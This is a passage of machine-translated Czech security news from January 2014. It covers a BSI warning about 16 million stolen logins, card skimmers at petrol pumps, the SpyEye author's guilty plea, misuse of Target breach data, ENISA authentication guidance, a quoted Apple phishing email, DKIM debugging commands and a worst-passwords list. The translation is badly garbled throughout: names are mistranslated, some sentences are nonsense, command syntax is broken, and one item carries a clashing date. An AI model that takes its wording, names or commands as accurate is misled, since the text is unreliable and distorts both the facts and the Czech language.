protivník - spíše než jen využije které vytvářejí. To je velký krok směrem k boji proti kybernetické bezpečnostní hrozby na nové bojiště -. Identifikací a obraně proti lidským nepřátelům, spíše než prostě snaží blokovat škodlivý kód " CrowdStrike předpovídá, že 2014 přinese zvýšené zaměření dodavatelů třetích stran, zneužívání nové generické domény Internetu top-level (gTLD), a zranitelná místa v systému Windows XP, které dosáhnou konce životnosti od společnosti Microsoft letos v dubnu. Zpráva předpovídá zvýšené využívání šifrování pomáhá chránit a poplést malware, větší využívání černých trhů pro nákup a prodej custom-made malware,. a zvýšené zaměření útoků kolem významných událostí, jako jsou olympijské hry, summitu G20 v roce 2014, a významných národních volbách v návaznosti na nedávné porušení hlavních prodejců, CrowdStrike tým také popisuje vývoj kybernetických zločinců, kteří se začínají rozvíjet schopnosti identifikovat a porušují konkrétní cíle ve snaze dat citlivých účtu.
16 milionů přihlášení ohrožena, varuje německý INFOSEC agenturu
31.1.2014 Hacking
Německý Spolkový úřad pro informační bezpečnost (BSI) vydala v úterý oznámení varování, že asi 16 milionů on-uživatelské účty byly ohrožena, a vyzvala uživatele k zda oni jsou mezi nimi.
Jedná se o údaje zřejmě objevili donucovacích orgánů po analýze botnety. Bohužel, BSI nesdílel další podrobnosti o vyšetřování. Oni řekl, že to není přesně jasné, jak a kdy se operátoři botnet se shromažďují tyto e-mailové adresy a hesla, ale že je také možné, že si koupil některé údaje z jiných zločinců. Vzhledem k tomu, e-maily jsou často používány jako výchozí uživatelská jména pro různé on-line účtů (e-mailových účtů, nakupování on-line, sociálních sítí, poskytovatelé internetových služeb), agentura nastavit webové stránky, kde mohou uživatelé zadat svou e-mailovou adresu a nechte jej zkontrolovat . podle seznamu napadených ty V případě, že byl, uživatelé jsou vyzýváni, aby pomocí AV řešení, kontrolovat jejich počítače malware, a pak okamžitě změnit všechny své on-line hesla -., a ne používat stejný jeden pro více účtů Důvodem, Proto agentura vydala toto varování je, že polovina z napadených účtů skončí . de , což znamená, že více než pravděpodobné, že patří k německým občanům. Podle místní , tento krádež digitálních identit byl objeven v prosinci 2013, ale agentura vzal svůj čas informovat potenciální oběti, protože potřebovali, aby to nastavit na výše uvedené webové stránky. I tak webové stránky byly původně havaroval počátečním lavina uživatelů. Zatím, někteří 880.000 + uživatelé, kteří používají místo zjistili, že byly ovlivněny.
Miliony ukradené přes Bluetooth-umožnil skimming zařízení
31.1.2014 Hardware | Bezpečnost
Třináct osoby byly obviněny Manhattan okresního prokurátora pro krádež obětí bankovních informací s skimming zařízení na čerpacích stanicích po celé jižních Spojených státech, a používat tyto informace k ukrást, a pak vyprat, více než 2.000.000 dolar za použití bankomatů a bank na Manhattanu.
Obžalovaní jsou také obviněn z praní špinavých ukradené peníze tím, že vklady a výběry hotovosti z ukradených výnosů dolů $ 10,000 ve více než 70 různých bankovních účtech. Čtyři vedení obžalované - Garegin Spartalyan, 40, Aram Martirosian, 34, Hayk Dzhandzhapanyan, 40, a Davit Kudugulyan, 42 - jsou účtovány v rámci 426-počítat obvinění z praní špinavých peněz, držení kradeného majetku, krádeže ve velkém měřítku, držení padělání zařízení a kovaných nástrojů na druhého stupně. Mezi další obžalovaní jsou každý obviněn z praní špinavých peněz. Podle dokumenty předložené u soudu, použité kreditní karty skimming zařízení kopírovat připíše danou částku na čtyři nejlepší obviněných a čísla ATM, stejně jako čísla kolíčkovými jednotlivci používané při čerpacích stanic Raceway a Racetrac celém Texasu, Gruzie a Jižní Karolína. se sbíráním zařízení byly vnitřně nainstalován, a proto nezjistitelné obětem, kteří zaplatili u čerpadel. Zařízení bylo také Bluetooth, takže žalovaní neměli fyzicky odstranit skimming zařízení za účelem získání ukradené osobní identifikační informace. Tyto špičkové obžalovaní pak údajně zakódováno, že odcizení informace na padělané karty. Přibližně od března 2012 do března 2013 se používají tyto padělané karty vybírat hotovost z bankomatů v Manhattanu, a poté uložen že ukradené peníze na bankovních účtech v New Yorku, které se stanovenými. Ostatní členové systému pak u bank v Kalifornii a Nevadě ihned stáhl ty peníze. Každý z transakcí obviněných bylo pod $ 10,000. Oni byli údajně strukturovány takovým způsobem, aby se zabránilo jakékoli požadavky na podávání zpráv o peněžních transakcí vyplývajících z právních předpisů a zamaskovat povahy, vlastnictví a řízení výnosů z trestné činnosti obžalovaných. Ze dne 26. března 2012 k 28 březnu 2013, obžalovaní jsou obviněni z praní špinavých přibližně 2.100.000 dolar.
Zkušební verze zdarma pro šifrování cloud-based a bezpečnou správu klíčů na AWS
31.1.2014 Šifrování
SafeNet oznámila třicet-denní zkušební verze zdarma své ProtectV virtuální řešení šifrování a virtuální KeySecure přes AWS Marketplace na Amazon Web Services (AWS). Finanční služby, organizace zdravotní péče, informační služby, podniky a high-tech podniky Nyní můžete spustit kompletní výrobní úrovni důkazy konceptu pro celý měsíc bez nákladů za použití cloudové šifrovací řešení SafeNet při zachování kontroly a dodržování předpisů. ProtectV a virtuální KeySecure jsou v současné době k dispozici na AWS Marketplace. ProtectV je šifrovací řešení pro virtuální instance a Virtual KeySecure je tvrzené Software Appliance, který spravuje a bezpečně uchovává šifrovací klíče pro ProtectV. šifrování SafeNet a správu klíčů řešení poskytovat zákazníkům s vysokou úrovní ochrany údajů k citlivým údajům, ať už v cloudu nebo na místě. Kombinace flexibility cloudu AWS a sílu šifrování nabídky SafeNet vytváří pohodlné řešení pro zákazníky optimalizaci úrovně bezpečnosti požadované pro i těch kritických zatížení. "Organizace si uvědomují, že šifrování a silné vedení klíč jsou nezbytné pro ilustraci kontrolu a dodržování pro vysokou hodnotu informací v cloudu, ale nemusí vědět, jak začít, "řekl David etue, viceprezident strategie firemní vývoj, SafeNet. "Díky bezplatné vyzkoušení SafeNet nabídky v AWS Marketplace, udělali jsme to jednoduché pro zákazníky, aby viděli, jak snadné je nasadit robustní rámec cloud šifrování." soud je za celých třicet dnů, kdy zákazníci podepsat-up mezi 09.01.2014 a 01.04.2014, a bude k dispozici na AWS Marketplace. Po třiceti-denní zkušební verzi, ProtectV a virtuální KeySecure mohou být převedeny na hodinové nebo měsíční cenový model na AWS Marketplace, podle toho, která volba je vybraná zákazník.
Většina zaměstnanců non-IT nemají "dostat" bezpečnostní politiky IT společnost
31.1.2014 Bezpečnost
DataMotion vydala výsledky svého druhého ročníku ankety o firemní e-mail a přenos souborů návyků. Jedním ze závěrů je dalekosáhlý komunikace rozpor mezi řízení IT a non-IT zaměstnanců na bezpečnostních a dodržování politiky. To zahrnuje takové kritické oblasti, jako je efektivní komunikace politik, jakož i využití volných spotřebitelských typu nástrojů pro přenos souborů a firemní e-mail na mobilních zařízeních. Kromě toho průzkum ukázal znepokojující procento v řízení IT vědomě riskovat shody, a dokonce i vypnutí základní schopnosti v důsledku technologické problémy. V době, kdy jsou velmi významné sankce jsou vybírané proti organizacím všech velikostí pro non-compliance a narušení dat, by vedení C-úrovni všímat. průzkumu dotázaných více než 400 IT a business s rozhodovací pravomocí napříč USA a Kanadou. . To zejména se zaměřením na ty, v odvětvích, která běžně zabývají citlivých údajů a shodu s regulatorními předpisy, jako jsou finanční služby, zdravotnictví a vlády Klíčové výhody patří: IT manažeři čelí komunikace odpojit
Celková vyprávění znamení odpojení je respondenty je míra důvěry měl ve schopnosti jejich společnosti předat audit shody: zaměstnanci non-IT jsou mnohem jistější (65,2% jsou "velmi" jisti), než ty, které v řízení IT (46,6%).
Oba IT a non-IT respondenti v drtivé většině uvedlo, že jejich firmy mají formální postup pro aktualizaci a komunikaci zabezpečení a dodržování zásad pro přenos souborů v elektronické podobě. Přesto, větší procento pracovníků non-IT (75,5%) oproti řízení IT (61,9%) se domnívá, zaměstnance / spolupracovníky plně pochopit těchto politik. Zatímco IT správa má matnější názor, pokud jde o porozumění, o průměru asi 1 na 3 z respondentů se domnívalo, zaměstnanci / spolupracovníky nejsou plně pochopit tyto zásady. To naznačuje, že vedení musí účinněji komunikovat politiky, a vytvořit větší povědomí o rizicích a spadu z porušení, zejména se zaměstnanci non-IT.
51,6% správy řekl zdarma spotřebitel služeb typu přenosu souborů jsou zakázány v jejich společnosti. Přesto pouze 24% pracovníků non-IT uvedlo, že tomu tak je.
E-mail šifrování a mobilní zařízení
Přestože 94,2% IT správa řekl mobilní zařízení pro firemní e-mailu jsou povoleny, pouze 62% pracovníků non-IT souhlasil - ale většina stále používat. To znamená nejen nedostatečné prosazování a komunikační politiky, naznačuje velké procento pracovníci mohou používat mobilní zařízení posílat citlivá data úmyslně nebo aniž by věděl, zda je to povoleno.
Mezi organizace s e-mailovými šifrovacích schopností, 44,4% stále chybí schopnost posílat a přijímat šifrované e-maily ze svého mobilního e-mailového klienta.
Celkově pouze 44% respondentů uvedlo, že jejich firma má politiku BYOD, i když 86,7% z týchž organizací povolit používání mobilních zařízení k e-mailu.
Zatímco 56,1% řízení IT uvedlo, že mají politiku BYOD místo, 74,9% zaměstnanců non-IT tvrdí, že buď nemají politiku nebo si nejste jisti, další jasně ukazuje, že politika nejsou účinně sdělovat.
Známky zlepšení, ale vážné riziko-brát přetrvává
71,7% respondentů uvedlo, že nyní mají e-mailové šifrovací funkce, což představuje nárůst o 6,2% více než 2012 výsledků průzkumu.
Důvěra v souladu se rozrostla i: 48.1% pocit "velmi" věří, jejich společnost by projít auditem shody, ve srovnání s 37,5% před rokem.
Z 80,9% respondentů, kteří uvedli, že jejich společnost má zabezpečení a dodržování zásad pro přenos souborů v elektronické podobě, 59% popsal výkon jako "velmi agresivní," zvýšení téměř o 12% v průběhu roku 2012.
I přes zlepšení, 79,5% respondentů se domnívá, zaměstnanci / spolupracovníky pravidelně nebo příležitostně porušovat bezpečnostní a dodržování zásad pro přenos souborů v elektronické podobě.
Když ptal se na jejich přístupu k plnění více než 1 do 5 v oblasti řízení IT (22,3%), řekl o své společnosti, "jsme riskovat, protože nemáme prostředky, aby bylo naprosto vyhovující."
Téměř 2 do 3 (62,6%), v řízení IT řekl filtrování politika, který se používá ke sledování obsahu odchozích e-mailu a soubor příloh pro účely shody, způsobuje problémy s falešným poplachům (zbytečně šifrované e-maily). Téměř čtvrtina (24,2%) připouští, že tak daleko, jak vypnout jejich filtrování na základě zásad.
"Je dobré vidět zlepšení v oblasti bezpečnosti a dodržování předpisů od poslední rok, ale vážné problémy zůstávají a nové se vyskytly," řekl DataMotion Chief Technology Officer, Bob Janáček. "Vždycky je tu poptávka po nových nástrojů, jako jsou e-mail na mobilních zařízeních -. Společnosti a pracovníci hledají lepší způsoby, jak získat práci úkolem je poskytovat šifrování a filtrování nástroje, které jsou snadné pro lidi, aby používali, a spolehlivý, takže don 't si zakázána. "IT musí držet krok, což je důvod, proč komunikace odpojte se zaměstnanci non-IT, stejně jako bytí přijata rizika, vyžadují okamžitou pozornost. Kromě toho, regulační vývoj v mnoha průmyslových odvětvích se rozšířila, což znamená, společnosti dosud vztahuje, může být nyní. Nedodržování může být zničující, "dodal Janáček." Tyto závěry průzkumu nám strukturovaný pochopení, že snad pomůže podnikům překonat a předvídat souvisejících otázek, zejména v době, kdy bezpečnost a dodržování předpisů může tak dramaticky ovlivnit spodním řádku.
Ruský tvůrce "SpyEye" malware přiznává, že bankovní podvody
30.1.2014 Viry
FBI oznámila zatčení a obvinění z Alexsandr Panin, 24, ruský hacker, který vyvinul SpyEye trojský kůň, a používal to, aby ukrást finanční informace a peníze z celého světa.
V prohlášení ministerstva spravedlnosti , Ricky Maxwell, úřadující zvláštní agent v poplatku, řekl, že: "zadržení pana Panin znamená, že jeden z nejlepších světových vývojářů škodlivého softwaru je již v pozici, vytvářet počítačové programy, které mohou postihovat lidi po celém světě. "
"Botnety, jako SpyEye představuje jednu z nejnebezpečnějších typů škodlivého softwaru na internetu dnes, které lze ukrást identitu a peníze lidí ze svých bankovních účtů bez jejich vědomí."
Panin vytvořil SpyEye v roce 2009. To je myšlenka k infikovaných více než 1,4 milionu počítačů ve svém životě, vytváří masivní botnet k pronájmu. Včera se přiznal k spiknutí s cílem spáchat drát a bankovní podvody u soudu v severní obvod Gruzie.
"Vzhledem k tomu, že nedávné odhalení masivní krádeže finančních informací z velkých maloobchodních prodejen po celé zemi, Američané nepotřebují třeba připomenout, jak zničující je, když počítačoví zločinci tajně nainstalovat škodlivý kód na počítačových sítích a sifon mimo osobní informace od nic netušících spotřebitelů, "řekl úřadující náměstek generálního prokurátora Mythili Raman.
Registrovat se uvádí, že Panin prodává vlastní verze SpyEye o tajuplných fóra pro od 1000 dolarů a 8500 dolarů. On je myšlenka k prodal SpyEye nejméně 150 lidí, z nichž jeden, s použitím "Soldier" alias používá malware ukrást $ 3,2 metrů.
Více než 10.000 bankovní účty po celém světě jsou myšlenka k byli hacknutý SpyEye. Panin zatčení vedl čtyři další zatýkání - ve Velké Británii a Bulharsku - lidí je známo, že se používají malware.
SpyEye byl použit jeden východní Evropy elipsoidnímu gang ukrást přibližně 70 m $ ze společnosti, církví a státních organizací v USA a Evropě, v závislosti na Yahoo .
Panin byl nejprve zkoumán v roce 2011, kdy agenti FBI zabavila SpyEye serveru v Gruzii. Pozdnější ten rok, agenti komunikovali s Panin - pod jeho jinak 'Gribodemon "a" Harderman "- včetně verze softwaru.
Byl zatčen v červenci 2013 okamžitě vydán do Atlanty, Gruzie. Panin byl na dovolené, na návštěvě kamaráda v Dominikánské republice, v závislosti na Rusku dnes .
Mluvčí ruského ministerstva zahraničí odsoudil zatčení: "Samozřejmě, že jsme vážně znepokojeni skutečností, že opět týká zatčení ruského občana s americkým rozkazu ve třetí zemi. Myslíme si, že skutečnost, že tyto praktiky se stává začarovaný tendence je naprosto nepřijatelné a nepřípustné, " říká ruské ministerstvo zahraničí informace a tiskové oddělení náměstek ředitele Maria Zacharová.
Společnosti musí zlepšit plány reakce na incidenty
30.1.2014 Incidenty
Bezpečnostní hrozby jsou na spadnutí, ale ředitelé a další členové řídícího týmu jsou v nevědomosti o možných kybernetických útoků proti jejich společností, říkají, že výsledky zprávy Ponemon Institute s názvem "Cyber Security Incident Response: Jsme připraveni, jak si myslíme, že ? "
Výzkum také ukazuje, že v důsledku, Computer Security Incident Response týmy (CSIRT), často chybí prostředky nezbytné pro odrazit trvalý nápor pokročilých hrozeb, kterým čelí dnešní organizace. pověřen Lancope, výzkum Ponemon Institut zkoumal 674 IT a bezpečnost IT . odborníci ve Spojených státech a ve Spojeném království, kteří jsou zapojeni do CSIRT činnosti jejich organizace studie shrnuje klíčové doporučení pro organizace, které chtějí zlepšit svůj proces reakce na incidenty: Bezpečnostní incidenty jsou na spadnutí - Šedesát osm procent respondentů uvedlo, že jejich organizace se zkušenostmi narušení bezpečnosti nebo mimořádné události v uplynulých 24 měsících. Čtyřicet šest procent říká, jiný incident je na spadnutí a může stát během příštích šesti měsíců. Řízení je velmi nevědomý kybernetických bezpečnostních hrozeb - Osmdesát procent respondentů uvedlo, že nemají často komunikovat s výkonným řízením o možných kybernetických útoků proti jejich organizaci . Organizace není měření účinnosti jejich úsilí reakce na incidenty - Padesát procent respondentů nemají významné provozní metriky pro měření celkové účinnosti reakce na incidenty. Porušení zůstávají nevyřešeny po celý měsíc - Zatímco většina organizací uvedlo, že by se mohlo zjistit bezpečnostní incident, během několika hodin, trvá celý měsíc v průměru pracovat prostřednictvím procesu vyšetřování incidentu, obnovení služby a ověřování. CSIRT chybí odpovídající investice - Polovina všech respondentů tvrdí, že méně než 10 procent z jejich bezpečnostních rozpočtů se používají pro incidentu . činností reakce, a většina tvrdí, že jejich rozpočty reakce na incidenty byly v uplynulých 24 měsíců nezvýšila auditní stopa sítě jsou nejúčinnější nástroj pro reakce na incidenty - Osmdesát procent respondentů tvrdí, že analýza kontrolních záznamů ze zdrojů, jako jsou NetFlow a paket zachytí je nejúčinnějším přístupem k detekci bezpečnostních incidentů a narušení. Tento výběr byl více populární než detekce narušení systémů a anti-virus software. "Je-li 2013 je nějaký náznak, dnešní podniky jsou špatně vybaveny identifikovat a zastavit sofistikované útoky zahájily národní státy, se zlými úmysly outsidery a určené zasvěcenci," řekl Mike Potts , prezident a generální ředitel společnosti Lancope. "Nyní je čas pro manažery C-úrovni a s rozhodovací pravomocí v oblasti IT, aby se spojily a rozvíjet silnější, více komplexní plány reakce na incidenty. Tato komunikace je rozhodující, pokud chceme snížit ohromující frekvence vysokou -profil narušení bezpečnosti osobních údajů a škodlivé firemní ztráty, které vidíme v médiích na téměř každodenně.
Údaje karty ukradené v cílové porušení začíná stále zneužívána
30.1.2014 Incidenty
Informace Platba kartou udeřil v masivní Target porušení byl spatřen zneužívány v Texasu, a dva mexičtí občané byli zatčeni a čelí federální obvinění. Podle AP zpráva, Mary Carmen Vaquera Garcia, 27, a Daniel Guardiola Dominguez, 28, z Monterrey, Mexiko, opakovaně vstoupil do USA a používá karty klonované z informací ukradené cíl provést velké množství nákupů v jižním Texasu. dva by se provádět ve svých podvodných invaze v neděli, snad v naději, že společnosti vydávající kreditní karty a maloobchodníci by nebyl schopen na místě krádeže v čase a které by jim umožnilo vrátit se do Mexika, aniž by se chytil. Karty, které byly použité klonované z ukradených informací vázána na South Texas obyvatel, aby platby méně podezřelé. Zdá se, První vpád byl proveden 12. ledna, a cílené Best Buy, Wal-Mart a hračky R Us obchodů v této oblasti. Poté, co byl objeven podvodné povahy transakcí, policie a tajné služby Spojených států byly přineseny do vyšetřit. Poté, co sledoval hodiny videokazet, které identifikoval vaquera Garcia a Guardiola Domingues, stejně jako auto, které používá. Příští neděli, když se snažili znovu vstoupit do USA se stejným vozem, úřady všiml a zastavil je. Měli 96 klonovaných karet s nimi v době zatčení. Dva podvodníci se zřejmě podílí jak na pořízení odcizených dat a fyzické vytváření klonovaných karet, ale podle McAllen policejní šéf Victor Rodriguez, mohli také být součástí většího spiknutí, a jsou propojeny do východní Evropy nebo Ruska podvodníci, kteří se "zřejmě prodávají datové sady podle krajů."
Finanční sektor potřebuje nereplikovatelného, pověření jedno použití
30.1.2014 Bezpečnost
Různé žetony, přístroje, mobilní telefony, elektronické podpisy, atd. jsou používány k ověření své e-identity. Přesto, některé finanční instituce jsou stále ještě nejsou s ohledem na riziko nedostatečné mechanismy ověřování podle nové studie agentury ENISA EU. Zpráva analyzuje současný e-Finance podvodů a koreluje s prověřujícími mechanismy finančních institucí "zákazníků", zdůrazňuje potřebu pro aktualizována bezpečnostní mechanismy, a poskytuje 10 doporučené postupy pro lepší zabezpečení. Agentura analyzovala více než 100 Průzkum odpovědi od obchodníků a e-bankovnictví odborníků na bezpečnost v elektronické identity a ověření metody (eIDA). Jedná se o občany, zákazníky a firmy používají v e-Finance a e-Platební systémy na denní bázi. Navíc agentura identifikovala rizika a vzory útoku pro každý mechanismus autentizace, včetně phishingových (cílené útoky), ID-krádež, . relace a identity hi-zvedání, atd., finančních institucí, obchodníků a poskytovatelů platebních služeb Jako výsledek, agentura vypracovala pokyny, osvědčené postupy a doporučení pro e-bankovnictví a internetové platby: 1. Zlepšit bezpečnost e-Finance prostředí , což znamená, že účastník finančních operací musí:
Proveďte analýzu rizik na základě profilu a velikosti instituce zákazníků,
Zlepšit informovanost a znalosti zákazníků,
Metody ověřování Tailor do profilů chování zákazníka a transakcí parametrů (např. země určení, množství.)
Dříve detekce zařízení kompromisu zákazníků, přes registraci zařízení, testování a hodnocení jeho bezpečnosti. ("Předpokládejme, že všechna zařízení jsou nakaženi").
2. Zlepšit bezpečnost e-Finance aplikací a jejich distribučních kanálů k zákazníkům : podpora tradiční "bezpečnosti již od návrhu". Měli byste také vzít v úvahu návrh nové směrnice o ochraně osobních údajů, a používat důvěryhodné kanály pro instalaci aplikací v přístroji zákazníků. 3. Podporovat proporcionalitu mezi Zvolená metoda (y), robustnost a identifikovat rizika (přiměřenosti eIDA do kontextu transakce), s důrazem na využití "2-faktoru ověřování" i pro nízké riziko operace (např. ATM má toto: karta a PIN kód). 4. Zlepšit znalosti a chování zákazníků i odborníků. Abychom to shrnuli, dnešní aktuální eIDA praxe ve finančním sektoru nepokrývají mnoho rizik. ECB a Evropská komise vyvíjí doporučení a předpisy, které budou odpovídat zprávě ENISA identifikovat a vytvářet nástroje, které snižují finanční ztráty v důsledku podvodů. "Finanční sektor spravuje e-transakce v řádu stovek miliard eur ročně. Proto, bezpečný e-identity a ověřování je prostě nutností pro ekonomiku Evropy, "komentoval ENISA výkonný ředitel profesor Udo Helmbrecht." Finanční instituce by měly používat zabezpečení jako konkurenční marketingový nástroj. Díky této zprávě, mohou účastníci finančních operací provést analýzu nákladů / přínosů dodatečných mechanismů autentizace.
Cybersecurity předpovědi na rok 2014
30.1.2014 Bezpečnost
Nástup nových technologií, bude rozšířená implementace mobilní a bezdrátové komunikace a zvýšení mobilním přijetí otevírají nové příležitosti pro fotoaparáty Cyber-zločinci. se v roce 2014 nyní v plném proudu, Catalin Cosoi, Chief Security stratég BitDefender, čerpá z jeho odbornosti předpovědět klíčové bezpečnostní hrozby na obzoru: Digitální důvěra je pryč: Malware podepsal s ukradenými digitálních certifikátů byl asi na chvíli, ale loňská "příští velká věc" byla malware podepsal s digitálními certifikáty výslovně zakoupených pro tento účel. Očekáváme, že tento trend bude pokračovat po 2014, a to zejména pro šedé oblasti softwaru, jako je agresivní adware nebo spyware. "internet věcí" na rozšíření: Do roku 2015 bude počet propojených zařízení ve světě dosáhnout 25 miliard, a to číslo bude do roku 2020 zdvojnásobit. Mezi tato zařízení patří: monitory zvířat; lékařské přístroje a zařízení; automobilových palubních počítačů a nouzové signalizaci, bóje a předměty pro domácnost, z nichž každý má své vlastní bezpečnosti implementací. "Internet of Things" je pravděpodobné, aby se stal hlavním cílem kybernetických zločinců kvůli pouhému počtu zařízení a špatné implementace zabezpečení. Cyber-zločinci se zaměřují Android uživatele: Android v současné době má asi 70 procent podílu na trhu mobilních OS , což je neuvěřitelně důležité, aby kybernetických zločinců. Přidání k tomu je skutečnost, že mobilní zařízení jsou platební mechanismus sami (prostřednictvím prémiových SMS, stejně jako nově zavedené platby NFC), bude počítačoví zločinci zvýšit své zaměření na rozvoj malware pro Android. Vznik BYOD také umožní počítačoví zločinci cílovým společnostem, jakož i domácí uživatele. E-mail spam je klesající, ať žije sociální sítě cílenou reklamu: Spam byl asi od úsvitu elektronických komunikací a získal vážné trakci při botnet éra. Zatímco objemy spam bude i nadále čerpat v roce 2014, bude počítačoví zločinci dát větší důraz na sociálních sítích, kde mohou efektivněji zaměřit oběti. se Facebook již překonal jednu miliardu aktivních uživatelů sociální sítě budou také využívány kybernetických zločinců se sklizeň ochotně sdílené informace pro kopí-phishing a pro šíření nových hrozeb. Slepé spam útoky, samozřejmě, být stále používány počítačovými zločinci v souvislosti s nebezpečnými přílohami, jak přidat počítače do botnetů. Staré technologie bude stále populární: ukončení Blížící se podpora pro Windows XP - že dosáhne konce své životnosti v dubnu 2014 - bude pravděpodobně nechal počítačoví zločinci jít po uživatele operačního systému, který již není oprava. Bez aktualizace zabezpečení, které mají být dodány, budou uživatelé Windows XP, a to zejména těch, v podnikových prostředích, stále zranitelnější po dubnu 2014. nošení Technologie může být terčem hackerů: nositelná zařízení, jako je například zdravotnictví, sledování náramky, jsou stále více populární s uživateli po celém světě a jsou také stále více propojeny s internetem. Jejich minimální velikost a zaměření na životnost baterie ponechává jen málo, aby žádný prostor pro zabezpečení, které mohou dát je do křížové palby hackerů přestřelce v blízké budoucnosti, i když ne nutně . roce 2014 Lékařské přístroje může být také v ohrožení: Stejně jako nositelné technologie, zdravotnické prostředky jsou stále více a více propojené. Jejich bezdrátové komunikační schopnosti umožňují lékařům sledovat zdravotní stav pacienta a výkonu zařízení, ale může také umožnit neoprávněným třetím stranám manipulovat s vybavením a způsobit okamžitou smrt. Malware roste větší a zákeřnější: Botnety jsou stále páteří každého Cyber-kriminální operace, od DDoS útoky na rozesílání spamu nebo nelegálně těžby Bitcoins na úkor oběti. Cyber-zločinci se zaměří na využití neopravených chyby v softwaru se připojit stroje na botnetů. Některé z větších botnetů bude pravděpodobně přepnout do peer-to-peer komunikační modely, aby se zabránilo takedown, zatímco ty menší budou používat sociální sítě jako záložní mechanismus pro komunikaci s jejich C & C servery. Malware překoná 250 milionů unikátních vzorků v průběhu 2014, protože na straně serveru polymorfismus funkcí, které jsou přítomny v téměř všech hlavních crimepacks na podzemní trhu.
Uživatelé Apple hit s "pomocí aktualizace nových SSL servery" phishing e-mail
30.1.2014 Šifrování
Uživatelé s Apple účtů jsou opět terčem s legitimními vypadající phishingových e-mailů, které jsou po jejich pověření účtu, osobní a finanční informace. "Váš on-line přístup byl zablokován," říká falešný e-mail vybaveny logem Apple a barevné schéma. "Jak součástí naší trvalé snahy poskytnout "nejlepší možný" služby a ochranu pro všechny naše zákazníky, jsme se vyžaduje, aby každý zákazník aktualizovat svůj účet (y) s použitím nových SSL servery, aby se zabránilo přerušení vámi on-line přístupu. Aktualizujte prosím svůj online účet (y) kliknutím prvku pod aktualizaci účtu. " nabídl odkaz se oběti na falešné Apple přihlašovací stránku, kde jsou vyzváni k zadání své Apple ID a heslo. Po "přihlášení", jsou vyzýváni, aby zadali své celé jméno, adresu, telefonní číslo, porodní údaje, rodné příjmení matky, jméno na platební karty, číslo karty, datum ukončení platnosti a bezpečnostní kód (klikněte na screenshotu pro zvětšení) : Jakmile tohle všechno info je předložen, oběti jsou přesměrovány na legitimní webové stránky Apple. Netřeba dodávat, že zadané informace končí v rukou kybernetických podvodníků, kteří jej budou používat k provedení krádeží identity, podvody karty, a unést obětí "Apple účet, aby bylo možné ji zneužít pro spam a jiné hanebné činnosti, varuje Hoax-Slayer .
Jak Ladění DKIM
30.1.2014 Spam
DKIM je jeden způsob, jak usnadnit ostatní servery zjistit, zda e-maily odeslané jménem vaší domény je falešné. Váš e-mail server přidat digitální podpis do každého e-mailu ověření zdroje. To není tak dobrý podpisu celý e-mail, ale je to užitečný nástroj, přinejmenším ověřit doménu použít jako součást záhlaví "From".
Problém je v tom, že DKIM může být obtížné ladit. Pokud jste mailová zamítnuta, je užitečné mít možnost ručně ověřit, co se stalo. Například, můžete mít různé klíče, a špatný klíč byl použit, což je jeden z záludnějších otázek k ladění.
Začněme se základy: nejprve se ujistěte, e-mail odešlete je skutečně podepsal. Podívejte se na "DKIM-Signature" záhlaví:
DKIM-Signature: v = 1; = rsa-sha256, c = uvolněný / jednoduchý, d = dshield.org;
s = default, t = 1391023518;
bh = wu4x1KKZCyCgkXxuZDq + 7322 im11hlsCET + KxQ9 +48 =;
h = Komu: Předmět: Datum: Z;
b = wVZQsIvZQe0i2YuhFNeUrpfet0wa7cIcwZ8LR9izWuF1E1NDQmpKUImCHO/RlPgYJ
wruW1IunQWRXtd4MQMuUZNsU1rGFzsYXoC4T6rVjHonQtQgoFSoEfo90KtZTC2riev
Existuje několik důležitých částí, které hledají:
d = dshield.org - to je doména, pro kterou podpis je dobré pro
s = default - to může být použita k definování různých klíčů.
Pomocí těchto dvou hodnot, můžeme zpřístupnit veřejné klíče od DNS:
$ Dig + krátký TXT default._domainkey.dshield.org
"V = DKIM1 \, k = rsa \, p = MIGfMA0G ... AQAB"
V tuto chvíli víme, který byl klíč používaný k podepisování záhlaví, a máme veřejný klíč pro ověření. Pravděpodobně jste již všiml algoritmus použitý k podepsání záhlaví: "= RSA-SHA256".
DKIM podepisuje pouze určité záhlaví. V našem případě jsme podepsali Komu, Předmět, Datum a od hlavičky, které lze vzít z "h = ..." pole výše.
U vzorku, e-mailu výše, jsou tyto hlavičky:
Pro: jullrich@euclidian.com
Předmět: Testování DKIM
Datum: St. 29.leden 2014 19:25:18 +0000 (UTC)
Od: jullrich@dshield.org (Johannes Ullrich)
Naštěstí jsme nemuseli dělat všechno ověření "od ruky". Místo toho můžeme použít "opendkim-testmsg" nástroj. Jsme JST projít syrové e-mailovou zprávu na něj.
Tento nástroj je velmi jednoduchý, v tom, že neposkytuje žádný výstup, pokud je ověření úspěšné. Nástroj bude automaticky načítat klíč.
Například:
$ Opendkim-testmsg <TestingDKIM.eml
$
Na selhání, budete mít obecný chybu:
$ Opendkim-testmsg <TestingDKIM.eml
opendkim-testmsg: dkim_eom (): Špatný podpis
Pokud tak učiníte implementovat DKIM, vřele doporučuji také nakonfigurovat adresy podávání zpráv prostřednictvím DMARC. Tímto způsobem, některé větší ISP vám poslat zprávu, pokud ověření DKIM selže.
"123456" sesadí "heslo" z vrcholu nejhorším seznamu hesel
28.1.2013 Šifrování
SplashData oznámila svou výroční seznam 25 nejčastějších hesel nalezených na internetu, a poprvé od té doby se společnost začala sestavování její roční přehled, "heslo" ztratil jeho titul jako nejčastější, a proto Nejhorší Password, a dva- Doba runner-up "123456" se pochybnou čest.
Letošní seznam byl ovlivněn velkým počtem hesla od uživatelů Adobe vyslaných on-line o bezpečnostní poradenské firmy striktury Consulting Group po dobře uveřejněný narušení bezpečnosti společnosti Adobe. "Vidět hesla jako" adobe123 "a" Photoshop "na tomto seznamu, nabízí dobré připomenutí není na založit heslo na název webové stránky nebo aplikace, kterou přistupuje, "říká Morgan Zabitý, generální ředitel společnosti SplashData. "Dalším zajímavým aspektem letošního seznamu je, že více krátké číselné heslo ukázal, i když webové stránky se začínají prosazovat silnější hesel , "řekl Zabitý. Například na letošním seznamu nové jsou jednoduché a snadno guessable hesla jako "1234" na # 16, "12345", u # 20, a "000000" na # 25. SplashData je "Nejhorší Hesla 2013" jsou: 1) 123456 ( Až 1 z roku 2012) 2) Heslo (Down 1) 3) 12345678 (nezměněno) 4) qwerty (až 1) 5) abc123 (Down 1) 6) 123456789 (nové) 7.) 111111 (až 2) 8) 1234567 ( Až 5) 9) iloveyou (Up 2) 10) adobe123 (New) 11) 123123 (až 5), 12) admin (New) 13) 1234567890 (New) 14) letmein (Down 7) 15. photoshop (nový) 16) 1234 (New) 17) opice (Down 11) 18), stín (beze změn) 19) Sunshine (Down 5) 20) 12345 (nový) 21) password1 (až 4) 22) 